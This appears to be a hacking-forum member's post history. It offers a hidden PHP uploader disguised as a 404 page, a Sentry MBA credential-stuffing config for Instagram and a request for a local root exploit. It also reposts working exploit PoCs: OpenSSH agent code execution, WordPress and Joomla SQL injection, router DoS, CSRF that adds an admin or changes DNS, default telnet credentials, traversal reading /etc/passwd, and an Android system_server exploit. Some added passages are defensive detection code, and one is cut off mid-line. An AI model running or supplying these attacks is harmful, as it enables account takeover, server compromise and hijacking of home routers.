M0RF!N

Member
  • Posts: 85
  • Reputation: 0 Neutral
  • 1 follower
  • Group: Converted
  • Name: M0RF!N
  • Main OS: Windows
  • Programming language: No
  1. M0RF!N

    ICSG Uploader

    Hi friends, the file I have attached for you is ICSG Uploader. It is a hidden uploader that you bring up with the GET method; in its normal state it shows a 404 error to anyone who opens the page. Usage: http://example.com/hidden.php?pass=icsg

    Attachment: hidden.rar
  2. M0RF!N

    Configs for various sites (important)

    Config Instagram ( Proxyless And Full Capture ) - Bot Between 1 to 10

    [Wordlist]
    UserIndex=1
    PassIndex=2
    EmailIndex=0
    E0F9C6B9D1B07AEB42007C5E58E463A2=0
    [settings]
    SiteURL=https://www.instagram.com/
    Timeout=20
    WaitBot=0
    ResolveHost=0
    ComboFilter=0
    UsernameStart=6
    UsernameEnd=8
    PasswordStart=6
    PasswordEnd=8
    ComboMode=0
    Letters=0
    Digits=0
    Alpha=0
    Email=0
    LowerUpper=0
    LetterDigit=0
    SpeciaChar=0
    PasswordLetters=0
    PasswordDigits=0
    PasswordAlpha=0
    PasswordEmail=0
    PasswordLowerUpper=0
    PasswordLetterDigit=0
    PasswordSpeciaChar=0
    EmailFilter=0
    EmailMode=0
    ProxyActivate=10
    ProxyRatio=4
    ProxyCombo=0
    WaitTime=1
    BanWindowWidth=1
    BanWindowProxies=10
    BanWindowRatio=10
    blnNoProxies=1
    RequestMethod=2
    Referer=2
    HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://www.instagram.com/|User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
    POSTData=username=<USER>&password=<PASS>
    [Fake]
    AfterFP=0
    FollowRedirect=1
    EnableConHits=0
    Success=3
    ConHits=0
    EnableConLength=0
    SourceTags=1
    ConLength=-1
    blnSuccess=0
    SuccessRetries=3
    blnForbToOK=1
    ForbToOkLength=1000
    blnBadOcrCode=0
    BadOcrCodeRetries=3
    blnCompleteNot=1
    HTTPFollow=1
    blnProcessErrors=1
    blnInvalidPath=1
    UserField=0
    [Keywords]
    HeaderFail=
    HeaderSuccess=
    HeaderBan=
    HeaderRetry=
    SourceFail=authenticated": false;The link you followed may be broken, or the page may have been removed.
    SourceSuccess=checkpoint_required;authenticated": true;Followers
    SourceBan=
    SourceRetry=
    EnableHeaderFail=0
    EnableHeaderSuccess=0
    EnableHeaderBan=0
    EnableHeaderRetry=0
    EnableSourceFail=1
    EnableSourceSuccess=1
    EnableSourceBan=0
    EnableSourceRetry=0
    EnableGlobalSourceRetry=1
    [Form]
    IAParse=0
    blnBasic=0
    Action=https://www.instagram.com/accounts/login/ajax/
    Username=username
    Password=password
    Email=
    CustomData=
    NoIndex=
    AddData=
    Cookie=mid=WAHxhwAEAAGD2VkMgSbXRTXuwZ-F; ig_vw=1024; ig_pr=1; csrftoken=nrYx97yIDN8MqdtFrXUj1R9owjDwQwHw
    IAction=-1
    IUser=-1
    IPass=-2
    IEmail=-2
    ICaptcha=-1
    ReqReferer=
    ReqCookie=
    AjaxURL=
    AjaxPOSTData=
    AjaxData=
    AjaxParsingCode=
    RefData=
    ParsingCode=
    FormRedirectUrl=
    RedPostData=
    LoginPostData=
    RedKeys=
    DataDesc=Followers&Following&Posts&Is_Private&Orginal
    CaptureParsingCode=<meta property="og:description" content="| Followers, * Following, ** Posts - See Instagram photos and videos from *|#00|#00|0|#00|#00|0&Followers, | Following|#00|#00|0|#00|#00|0&Following, | Posts|#00|#00|0|#00|#00|0& "is_private": |, "|#00|#00|0|#00|#00|0&"is_verified": |, "|#00|#00|0|#00| WickedGod|0
    RefreshSession=0
    RefreshCookie=1
    IAMethod=2
    POSTMethod=2
    RedMethod=1
    LoginMethod=1
    AjaxHeader=0
    FormHeader=1
    RedHeader=0
    LoginHeader=0
    ImageAfterAjax=0
    FollowRedirectsOnIA=0
    FollowRedirectsOnRed=1
    [Ajax]
    Variables=csrftoken||Login Page||None||Costant||x-csrftoken: ||&||None||Cookie||csrftoken=||-1||-1||0||0||0||0&&ajax||Login Page||None||csrftoken||||&||None||Costant||\nx-instagram-ajax: 1||0||-1||0||0||0||0
    PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&ajax&&None&&None&&None&&None&&None&&None&&None&&None
    RedURL=https://www.instagram.com/<USER>
    [OCR]
    OCRMode=0
    URLMode=0
    ImageURLID=||
    Captcha=
    OCRKey=
    RefreshCaptcha=0
    blnContrast=0
    blnBrightness=0
    blnSaturation=0
    blnThreshold=0
    blnInvert=0
    blnNoise=0
    blnIsolate=0
    blnResize=0
    blnBorder=0
    blnCharExtract=0
    blnRemoveColors=0
    blnStringFilter=0
    blnLetter=1
    blnDigits=1
    blnBlur=0
    blnReconstruct=0
    blnLower=0
    blnUpper=0
    blnRemoveLines=0
    blnMultiChar=0
    blnPalette=0
    blnCharResize=0
    blnCharSubExtraction=0
    blnGif=0
    blnCompute=0
    blnBorderPre=0
    Contrast=0
    Brightness=0
    Saturation=0
    Threshold=0
    Noise=1
    Isolate=1
    Resize=2
    BorderLeft=0
    BorderTop=0
    BorderRight=0
    BorderBottom=0
    CharExtractMinBlack=0
    CharExtractMaxBlack=1
    CharExtractMinWidth=1
    CharRotateMax=0
    CharRotateSteps=5
    MinLength=1
    MaxLength=10
    BlurRadius=1
    CharExtractMaxWidth=33
    CharWidthMinBlack=2
    CharSpace=1
    Range=0
    InvertDensity=0
    InvertLength=20
    LineCurvatureMax=4
    LineWidthMax=13
    CharResize=1
    CharHeight=13
    GifStart=2
    GifOffset=2
    BorderLeftPre=0
    BorderTopPre=0
    BorderRightPre=0
    BorderBottomPre=0
    CharBorderH=5
    CharBorderV=5
    CharRotateBorder=5
    CharExtractMinHeight=1
    VerticalRejoin=30
    CharExclude=
    SpecialChars=
    Colors=
    Colors2=
    Lines=Min Length: 2, Max Width: 5, Horizzontal
    Language=eng
  3. Hi. According to the checks that were done, it seems this messenger has a bug, and the bug has also been sent to the management of this application! In general, don't trust Iranian applications too much, because their security is not at an acceptable level.
  4. Hi ... very nice ... Didn't you write a script to revert it to the original state?
  5. M0RF!N

    Instagram config

    Hi .. I have attached a working Instagram config for you ... It is better to set Bot to 3 .. P.S.: the config is for the Sentry MBA program. Ya Ali

    Attachment: instagram.rar
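    The two Instagram posts above attach a Sentry MBA config and say only how many bot threads to use. The following is an added example, written for this page and not part of the post or of Sentry MBA: it parses the INI-style config text and derives the concrete login request the tool would send, then lists the header values that never change across attempts, which are the cheap signatures a defender can alert on. SAMPLE_CONFIG is a trimmed excerpt of the posted config (only the keys the example needs); the request method is inferred from the presence of POSTData, since the meaning of Sentry's numeric RequestMethod codes is not stated on the page.

```python
"""Added example: turn a Sentry MBA config into a request template and detection markers.
Not part of the forum post or of Sentry MBA. SAMPLE_CONFIG is a trimmed excerpt
of the config posted above; keys the example does not use are omitted."""
import configparser

SAMPLE_CONFIG = """\
[settings]
SiteURL=https://www.instagram.com/
Timeout=20
ProxyActivate=10
blnNoProxies=1
RequestMethod=2
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://www.instagram.com/|User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
POSTData=username=<USER>&password=<PASS>
[Keywords]
SourceFail=authenticated": false;The link you followed may be broken, or the page may have been removed.
SourceSuccess=checkpoint_required;authenticated": true;Followers
EnableSourceFail=1
EnableSourceSuccess=1
[Form]
Action=https://www.instagram.com/accounts/login/ajax/
Cookie=mid=WAHxhwAEAAGD2VkMgSbXRTXuwZ-F; ig_vw=1024; ig_pr=1; csrftoken=nrYx97yIDN8MqdtFrXUj1R9owjDwQwHw
"""

# Placeholders Sentry substitutes per attempt; anything containing one is not a static marker.
PLACEHOLDERS = ("<ACTION>", "<FORM ACTION>", "<HTTP VERSION>", "<HOST>", "<USER>", "<PASS>")


def load_config(text):
    """Parse the config. Values contain ':' and ';' so only '=' may split keys,
    and interpolation is off because values contain '%' in real configs."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=True)
    cp.optionxform = str          # keep key case (blnNoProxies, HTTPHeader, ...)
    cp.read_string(text)
    return cp


def login_request(cp):
    """Reconstruct the HTTP request template the config makes the tool send."""
    s, f, k = cp["settings"], cp["Form"], cp["Keywords"]
    fields = [h for h in s["HTTPHeader"].split("|") if h]   # '|' separates header lines
    request_line, headers = fields[0], fields[1:]
    static = {}
    for h in headers:
        name, _, value = h.partition(": ")
        if not any(p in value for p in PLACEHOLDERS):
            static[name] = value
    return {
        "method": "POST" if s.get("POSTData") else "GET",     # assumption: POSTData present => POST
        "url": f["Action"],
        "request_line": request_line,
        "static_headers": static,
        "cookie": f["Cookie"],                                # replayed unchanged on every attempt
        "body_template": s["POSTData"],
        "proxyless": s.getboolean("blnNoProxies"),
        "success_markers": [m for m in k["SourceSuccess"].split(";") if m],
        "fail_markers": [m for m in k["SourceFail"].split(";") if m],
    }


def detection_markers(req):
    """Header values fixed in the config, identical across all attempts: a
    WAF/SIEM rule keyed on this combination plus a high login rate is cheap."""
    markers = dict(req["static_headers"])
    markers["Cookie"] = req["cookie"]
    return markers


if __name__ == "__main__":
    r = login_request(load_config(SAMPLE_CONFIG))
    print(r["method"], r["url"], "proxyless" if r["proxyless"] else "via proxies")
    for name, value in detection_markers(r).items():
        print(f"  {name}: {value}")
```

    The fixed Firefox 48 User-Agent, the Referer, Pragma: no-cache and the single replayed cookie are what distinguish this tool's traffic from a browser's; the success/fail markers show that the config treats a checkpoint_required response as a hit, so challenge responses should be counted as attempts, not as blocks.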
  6. M0RF!N

    Local root request!

    Hi... thanks, but it didn't work and I didn't get root :(
  7. M0RF!N

    Local root request!

    Hello dear friends .... I wanted to see whether anyone has a local root for the server below?

    Linux server3.dn-server.com 2.6.32-673.26.1.lve1.4.15.el6.x86_64 #1 SMP Sun Jul 17 09:01:31 EDT 2016 x86_64
  8. Greetings... Today I am introducing a set of add-ons that will be useful to you for information gathering and for testing some bugs on a target.

    1 - XSS Me: an add-on for testing XSS vulnerabilities in sites.
    https://addons.mozilla.org/en-us/firefox/addon/xss-me/

    2 - SQL Inject Me: an add-on for testing SQL injection vulnerabilities in sites.
    https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

    3 - Tamper Data & Live HTTP Headers: tools for viewing and editing HTTP and HTTPS headers and POST parameters.
    https://addons.mozilla.org/En-us/firefox/addon/tamper-data/
    https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

    4 - Wappalyzer: a tool for identifying the type of CMS and the tools in use, etc.
    https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/

    5 - Domain Details: provides detailed information about domains such as Whois, IP address, server type, etc.
    https://addons.mozilla.org/en-US/firefox/addon/domain-details/
  9. M0RF!N

    OpenSSH < 7.4 - Agent Protocol Arbitrary Library Loading

    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009

    The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.

    This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.

    To reproduce the issue, first create a library that executes some command when it is loaded:

    $ cat evil_lib.c
    #include <stdlib.h>

    __attribute__((constructor)) static void run(void) {
      // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
      // prevent recursion through system()
      unsetenv("LD_PRELOAD");
      unsetenv("LD_LIBRARY_PATH");
      system("id > /tmp/test");
    }
    $ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall

    Connect to another machine using "ssh -A". Then, on the remote machine:

    $ ssh-add -s [...]/evil_lib.so
    Enter passphrase for PKCS#11: [just press enter here]
    SSH_AGENT_FAILURE
    Could not add card: [...]/evil_lib.so

    At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:

    $ cat /tmp/test
    uid=1000(user) gid=1000(user) groups=[...]

    Fixed in http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/ssh-agent.c.diff?r1=1.214&r2=1.215&f=h
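    The report above shows the attack through ssh-add -s, which hides that the provider name travels to the agent as a plain string inside an SSH_AGENTC_ADD_SMARTCARD_KEY message. The following is an added example, written for this page and not taken from the Project Zero report or from OpenSSH: it encodes and decodes that message so the attacker-controlled field is visible at the byte level, and models the provider-path allowlist that ssh-agent gained with the fix (the -P option in OpenSSH 7.4; the default pattern "/usr/lib/*,/usr/local/lib/*" and the exact match semantics are assumptions here). The normalisation check that rejects "/usr/lib/../../tmp/x.so" is this example's own hardening, not OpenSSH's code. Message-type numbers follow the draft-miller-ssh-agent protocol document. send_to_agent() talks to a live agent over SSH_AUTH_SOCK and is only for use against an agent you own.

```python
"""Added example (not part of the Project Zero report or of OpenSSH):
the SSH_AGENTC_ADD_SMARTCARD_KEY request that `ssh-add -s <provider>` sends,
plus a model of the agent-side provider allowlist introduced with the fix."""
import fnmatch
import os
import posixpath
import socket
import struct

# Message types from the draft-miller-ssh-agent protocol document.
SSH_AGENTC_ADD_SMARTCARD_KEY = 20
SSH_AGENT_FAILURE = 5
SSH_AGENT_SUCCESS = 6

# Assumed default of ssh-agent -P (OpenSSH 7.4); comma-separated glob patterns.
DEFAULT_ALLOWLIST = "/usr/lib/*,/usr/local/lib/*"


def ssh_string(data: bytes) -> bytes:
    """The agent protocol 'string' type: uint32 big-endian length, then bytes."""
    return struct.pack(">I", len(data)) + data


def build_add_smartcard_key(provider: str, pin: str = "") -> bytes:
    """Framed request: uint32 length | byte type | string provider | string pin.
    `provider` is the path the unpatched agent hands straight to dlopen()."""
    body = (bytes([SSH_AGENTC_ADD_SMARTCARD_KEY])
            + ssh_string(provider.encode())
            + ssh_string(pin.encode()))
    return struct.pack(">I", len(body)) + body


def parse_add_smartcard_key(frame: bytes):
    """Inverse of build_add_smartcard_key(); returns (type, provider, pin)."""
    (length,) = struct.unpack(">I", frame[:4])
    body = frame[4:4 + length]
    if len(body) != length or not body:
        raise ValueError("short or empty agent frame")
    fields, off = [], 1
    for _ in range(2):
        (n,) = struct.unpack(">I", body[off:off + 4])
        off += 4
        fields.append(body[off:off + n].decode())
        off += n
    return body[0], fields[0], fields[1]


def provider_allowed(provider: str, allowlist: str = DEFAULT_ALLOWLIST) -> bool:
    """Agent-side gate modelled on the -P allowlist. The normpath check is this
    example's addition: a glob like /usr/lib/* also matches /usr/lib/../../tmp/x.so."""
    if not provider.startswith("/"):
        return False
    if posixpath.normpath(provider) != provider:
        return False
    return any(fnmatch.fnmatchcase(provider, pat) for pat in allowlist.split(","))


def agent_response(frame: bytes, allowlist: str = DEFAULT_ALLOWLIST) -> int:
    """Decision a patched agent would take for one request frame."""
    msg_type, provider, _pin = parse_add_smartcard_key(frame)
    if msg_type != SSH_AGENTC_ADD_SMARTCARD_KEY or not provider_allowed(provider, allowlist):
        return SSH_AGENT_FAILURE
    return SSH_AGENT_SUCCESS   # real agent: path now goes to ssh-pkcs11-helper and dlopen()


def send_to_agent(frame: bytes) -> int:
    """Send a frame to the live agent on SSH_AUTH_SOCK and return the reply type.
    Against an unpatched agent this loads the library; use only on your own agent."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect(os.environ["SSH_AUTH_SOCK"])
        s.sendall(frame)
        (length,) = struct.unpack(">I", s.recv(4))
        return s.recv(length)[0]


if __name__ == "__main__":
    frame = build_add_smartcard_key("/tmp/evil_lib.so")
    print(frame.hex())
    print("patched agent would answer:", agent_response(frame))
```

    The allowlist only helps once the agent is patched; the mitigation that does not depend on the agent is to stop forwarding it to hosts you do not control (ForwardAgent no, and ProxyJump instead of -A for multi-hop access), since forwarding is what lets the remote side send this message at all.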
  10. # Exploit Title: Unauthenticated SQL injection in 404 plugin for WordPress v1.0
    # Google Dork: N/A
    # Date: 17/12/2016
    # Exploit Author: Ahmed Sherif (Deloitte)
    # Vendor Homepage: N/A
    # Software Link: https://wordpress.org/plugins/404-redirection-manager/
    # Version: V1.0
    # Tested on: Linux Mint
    # CVE : N/A

    The plugin does not properly sanitize the user input. Hence, it was vulnerable to SQL injection. The vulnerable page is: custom/lib/cf.SR_redirect_manager.class.php on line 356

    [#] Proof of Concept (PoC):

    GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL HTTP/1.1
    Host: localhost
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: wp-settings-time-1=1480877693
    Connection: close
  11. M0RF!N

    Joomla! Component DT Register - 'cat' SQL Injection

    Title: SQL injection in Joomla extension DT Register
    Credit: Elar Lang / https://security.elarlang.eu
    Vulnerability: SQL injection
    Vulnerable version: before 3.1.12 (Joomla 3.x) / 2.8.18 (Joomla 2.5)
    CVE: pending
    Full Disclosure URL: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
    Vendor: DTH Development
    Vendor URL: http://www.dthdevelopment.com/
    Product: DT Register "Calendar & Event Registration"
    Product URL: https://extensions.joomla.org/extension/dt-register
    Product URL: http://www.dthdevelopment.com/joomla-components/dt-register-event-registration-for-joomla.html

    # Background
    "DT Register is the Joomla Event Registration component that gives you functionality beyond what any other event booking solution can offer" (https://extensions.joomla.org/extension/dt-register)

    # Vulnerability
    SQL injection in Joomla extension "DT Register" by DTH Development allows a remote unauthenticated attacker to execute arbitrary SQL commands via the cat parameter.

    # Preconditions
    No pre-conditions for authentication or authorization.

    # Proof-of-Concept
    http://[DOMAIN]/[PATH]/index.php?controller=calendar&format=raw&cat[0]=SQLi&task=events

    PoC value (shows out all events / it's possible to see valid eventId values):
    cat[0]=6) OR 1-- -

    ## Using UNION
    For reading the data out using UNION it's important to have and to know one valid eventId (detected in the previous step). In total there are 112 fields in the select query; the eventId position is no 13. For output it is best to use position 112.
    Step-by-step instructions on how to read the data out are available in the blog: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html

    # Vulnerability Disclosure Timeline
    Full communication is available in the blog: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html

    2016-10-17 | me > DTH | via web form - I would like to report some security holes. What is the correct way for that?
    2016-10-18 | me > DTH | any response?
    2016-10-25 | me > DTH | mail to [email protected]
    2016-10-25 | DTH > me | * "you are not in our client list" * "Our site (dthdevelopment.com) is protected by an enterprise grade firewall"
    2016-10-25 | me > DTH | I'm whitehat, technical details
    2016-10-25 | DTH > me | description, what kind of serious problems I may face
    2016-10-25 | me > DTH | explanations
    2016-11-02 | me > DTH | hello?
    2016-11-11 | me > DTH, SiteLock | Last call.
    2016-11-11 | SiteLock / DTH / me | some communication
    2016-11-12 | DTH > SiteLock (CC to me) | "It was configured to be open in the setup"
    2016-11-15 | DTH | Released DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5)
    2016-12-05 | DTH > me | "Sorry, forgot to respont on this. We closed the problem on our demo site".
    2016-12-12 | me | Full Disclosure on security.elarlang.eu
    2016-12-13 | me | Full Disclosure on FullDisclosure mailinglist on seclists.org

    ## asking CVE from DWF (Distributed Weakness Filing Project) / http://iwantacve.org
    2016-10-20 | me > DWF | CVE request
    2016-10-31 | DWF > me | "CVE - Acceptance of MITRE Terms of Use for CVE Assignment"
    2016-10-31 | me > DWF | I accept
    2016-11-19 | me > DWF | Any feedback or decision? (still no response)
    2016-12-11 | me > DWF | Is there any hope to get feedback? (still no response)

    As I haven't got any feedback, you can take this post as a CVE request.

    # Fix
    DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5).

    --
    Elar Lang
    Blog @ https://security.elarlang.eu
    Pentester, lecturer @ http://www.clarifiedsecurity.com
  12. M0RF!N

    ARG-W4 ADSL Router

    # Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
    # Date: 2016-12-11
    # Exploit Author: Persian Hack Team
    # Discovered by : Mojtaba MobhaM
    # Tested on: Windows AND Linux
    # Exploit Demo : http://persian-team.ir/showthread.php?tid=196

    1 - Denial of Service

    #!/usr/bin/python
    import urllib2
    import urllib

    site = raw_input("Enter Url : ")
    site = site + "/form2Upnp.cgi"
    # the router's default HTTP basic-auth credentials
    username = 'admin'
    password = 'admin'
    p = urllib2.HTTPPasswordMgrWithDefaultRealm()
    p.add_password(None, site, username, password)
    handler = urllib2.HTTPBasicAuthHandler(p)
    opener = urllib2.build_opener(handler)
    urllib2.install_opener(opener)
    # a UPnP form submission with an empty daemon value; the request either hangs or errors out,
    # and the PoC reports done in both cases
    post = {'daemon': ' ', 'ext_if': 'pppoe+1', 'submit.htm?upnp.htm': 'Send'}
    data = urllib.urlencode(post)
    try:
        html = urllib2.urlopen(site, data)
        print ("Done ! c_C")
    except:
        print ("Done ! c_C")

    2-1 Cross-Site Request Forgery (Add Admin)

    <html>
    <body>
    <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
    USER:<input type="text" name="username" value="mobham" />
    <input type="hidden" name="privilege" value="2" />
    PWD:<input type="text" name="newpass" value="mobham" />
    RPWD:<input type="text" name="confpass" value="mobham" />
    <input type="hidden" name="adduser" value="Add" />
    <input type="hidden" name="hiddenpass" value="" />
    <input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

    2-2 Cross-Site Request Forgery (Change DNS)

    <html>
    <body>
    <form action="http://192.168.1.1/form2Dns.cgi" method="POST">
    <input type="hidden" name="dnsMode" value="1" />
    DNS<input type="text" name="dns1" value="2.2.2.2" />
    DNS 2<input type="text" name="dns2" value="1.1.1.1" />
    DNS 3<input type="text" name="dns3" value="" />
    <input type="hidden" name="submit.htm?dns.htm" value="Send" />
    <input type="hidden" name="save" value="Apply Changes" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
  13. M0RF!N

    Android - Inter-process munmap

    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=928

    Bitmap objects can be passed between processes by flattening them to a Parcel in one process and un-flattening them in another. In order to conserve memory, there exists a code path which allows Bitmaps to be shared between processes by providing an ashmem-mapped file descriptor containing the Bitmap's raw pixel data.

    The android.graphics.Bitmap class illegally assumes that the size of the ashmem region provided by the user matches the actual underlying size of the Bitmap. When un-flattening a Bitmap from a Parcel, the class first calculates the assumed size of the Bitmap from the user-provided dimensions. Then, it calls Parcel::readBlob in order to map the given ashmem file descriptor to the process's VAS. This mapping is done using the size calculated from the Bitmap's dimensions (and not the size of the underlying ashmem descriptor).

    Later, the Bitmap constructor internally stores the ashmem file descriptor and mapped memory address, along with the size of the mapping. However, instead of using the same calculated size which was used when mapping the shared memory region, it accidentally queries the ashmem region for its real size, like so:

        mPixelStorage.ashmem.size = ashmem_get_size_region(fd);

    This size can be completely controlled by an attacker (simply by calling ASHMEM_SET_SIZE), and may be arbitrarily large. Later, when the Bitmap is GC-ed, the destructor triggers a call to Bitmap::doFreePixels which unmaps the Bitmap's data, by calling:

        munmap(mPixelStorage.ashmem.address, mPixelStorage.ashmem.size);

    This means that an attacker can cause the size of the unmapped region to be arbitrarily large, thus unmapping crucial regions in the remote process's VAS. One example of how this can be exploited is by unmapping the remote process's heap (which is directly after the mmap-ed ranges on the device I was working on). Then, the attacker can resend a large Bitmap which will be mapped over the (previously unmapped) heap, thus allowing the attacker to effectively replace the remote process's heap with controlled data.

    I've attached a short PoC which crashes system_server by repeatedly unmapping large memory regions.

    Suggested Fix: Store the calculated size in mPixelStorage.ashmem.size instead of calling ashmem_get_size_region.

    Here's a brief run-down of the exploit:

    1. The exploit begins by calling AudioService.unloadSoundEffects in order to close the SoundPool instance in system_server. This also closes any auxiliary threads (SoundPool, SoundPoolThread, etc.) that are associated with this pool.

    2. Now, we start "massaging" system_server's VAS. This is done by creating multiple "Notification" objects which contain Bitmaps that are of exactly the same size as a thread's stack, when created by the ART runtime. As the bitmaps are allocated by using "mmap", they will simply inhabit the highest memory address between mm->mmap_base and TASK_SIZE which contains a sufficiently large contiguous hole. Causing many allocations of the aforementioned size will ensure that any "holes" of this size in higher addresses are filled, and the remaining "mmap"-s of this size will be contiguous.

    3. Now that we are certain allocations of size THREAD_SIZE are contiguous, we replace one of the notifications created in the previous stage with a notification containing a small (or empty) bitmap, and immediately send multiple dummy transactions to system_server in order to force garbage collection of the freed bitmap object. This will enable us to open up a "hole" in the contiguous allocations, like so:

        <--low                                                    high-->
        ----------------------------------------------------------------
        | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap |
        ----------------------------------------------------------------
                                       ||
                                       \/
        <--low                                                    high-->
        ----------------------------------------------------------------
        | Bitmap | Bitmap ||||hole|||| Bitmap | Bitmap | Bitmap | Bitmap |
        ----------------------------------------------------------------

    4. Now that there's a THREAD_SIZE-sized hole opened up, we can call AudioSystem.loadSoundEffects() in order to re-create the SoundPool object within system_server. This will allocate a new "SoundPoolThread" thread in system_server, which (after brief initialization) enters a polling loop on a condition variable (or rather, a futex), waiting for messages to be enqueued. However, this thread's stack will be directly mmap-ed in our previously created hole, like so:

        <--low                                                               high-->
        ---------------------------------------------------------------------------
        | Bitmap | Bitmap |SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
        ---------------------------------------------------------------------------

    5. Now, similarly to step 3, we can free the chunk directly before the previously unmapped chunk, creating the following state:

        <--low                                                                 high-->
        -----------------------------------------------------------------------------
        | Bitmap ||||hole||||SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
        -----------------------------------------------------------------------------

    6. Finally, we send our "poisoned" bitmap object, which should get allocated directly in front of the SoundPoolThread's stack. Then, we force garbage collection once more, resulting in both the bitmap and the SoundPoolThread's stack being unmapped. However, since the SoundPoolThread is still waiting on a futex, this is fine. Here's what this stage looks like:

        <--low                                                                    high-->
        --------------------------------------------------------------------------------
        | Bitmap |Poison Bitmap|SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap |
        --------------------------------------------------------------------------------
                                               ||
                                               \/
        <--low                                                                    high-->
        --------------------------------------------------------------------------------
        | Bitmap ||||||||||||||||hole||||||||||||||||| Bitmap | Bitmap | Bitmap | Bitmap |
        --------------------------------------------------------------------------------

    7. At this point we can enqueue another notification, this time backed by a specially crafted ashmem file, containing two separate pieces of information:
       a. A chunk of position independent ARM/ARM64 code, followed by
       b. A ROP stack
       This notification will be of size THREAD_SIZE*2, and will therefore fill up the hole we just set up, resulting in the following state:

        <--low                                                       high-->
        -------------------------------------------------------------------
        | Bitmap | PIC code | ROP Stack | Bitmap | Bitmap | Bitmap | Bitmap |
        -------------------------------------------------------------------

    8. Now, we can safely call AudioService.unloadSoundEffects() once more. This will signal the condition variable that SoundPoolThread was waiting on, but now when it returns it will be executing our own ROP stack. The ROP stack simply mmap-s the ashmem file descriptor with PROT_EXEC and jumps into it (essentially executing the PIC code we supplied).

    Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip
  14. M0RF!N

    Shuttle Tech ADSL Wireless 920 WM

    ######################
    # Exploit Title : Shuttle Tech ADSL WIRELESS 920 WM - Multiple Vulnerabilities
    # Version: Gan9.8U6X-B-TW-R1B020_1T1RP
    # Exploit Author : Persian Hack Team
    # Tested on [ Win ]
    # Date 2016/12/05
    ######################

    1. Cross Site Scripting

    PoC: First we need to log in to the panel; the page parameter is vulnerable to cross-site scripting:
    http://192.168.1.1/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=%3Cscript%3Ealert%28%22c_C%22%29%3C/script%3E

    2. Default Telnet Root Password

    PoC: Username: root / Password: root

    telnet 192.168.1.1
    (none) login: root
    Password: root
    ~ $ cat /proc/version
    Linux version 2.6.19 ([email protected]) (gcc version 3.4.6-1.3.6) #3 Fri May 18 13:09:57 CST 2012

    3. Directory Traversal

    PoC: First we need to log in to the panel; the getpage parameter is vulnerable to local file disclosure:
    http://192.168.1.1/cgi-bin/webproc?getpage=../../../../etc/passwd&var:menu=setup&var:page=
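    The four web advisories in this thread (the 404 plugin and DT Register SQL injections, the ARG-W4 CSRF forms, and the Shuttle XSS and directory traversal) all leave a recognisable shape in an access log. The following is an added example, written for this page and not part of any of the advisories: a small log triage pass that decodes each request target and flags those shapes, run over constructed combined-format log lines (the IPs, timestamps and hostnames are made up; the query strings are the ones the PoCs show). The cross-origin rule assumes the router's own address is 192.168.1.1, as in the PoCs, and that a browser-driven admin POST carries a Referer from that host.

```python
"""Added example (not from the advisories above): access-log triage for the
request shapes the 404 plugin, DT Register, ARG-W4 and Shuttle PoCs produce.
SAMPLE_LOG lines are constructed; only the payloads come from the PoCs."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Combined log format: ip - - [ts] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
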